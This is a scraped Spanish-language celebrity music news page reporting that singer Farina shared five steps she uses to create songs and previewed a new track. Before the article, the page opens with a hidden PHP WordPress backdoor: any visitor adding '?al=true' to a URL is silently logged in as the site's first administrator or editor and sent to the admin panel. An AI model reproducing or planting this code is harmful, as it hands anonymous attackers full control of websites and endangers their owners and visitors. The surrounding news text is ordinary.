// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Farina da a conocer los pasos que tiene para crear música - Dicomania Tu Manía
MusicManía

Farina da a conocer los pasos que tiene para crear música

La reconocida cantante y actriz Farina quiso revelar una de las formas en que ella hace música, pues esto lo compartió en su perfil de Instagram, en donde cuenta con más de 5 millones de seguidores y por lo que cuenta la cantante tiene más de una manera de hacer sus canciones.

Ella inicia el video con un fraternal saludo y comenta que tiene 5 pasos para la creación de la música y el primero es que le debe encantar la pista, el segundo buscar un concepto, el tercer paso debe entrar a cabina para iniciar a sacar tarareos o melodías, el cuarto paso es iniciar a grabar sus líneas y confiesa que es uno de los más importantes y el quinto y último paso es grabar.

Advertisements

En el video la cantante aprovecho para presentar un adelanto de su nueva canción Adicta al perreo y aunque aun no ha salido los internautas están ansiosos por escuchar completo el nuevo éxito de la cantante.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top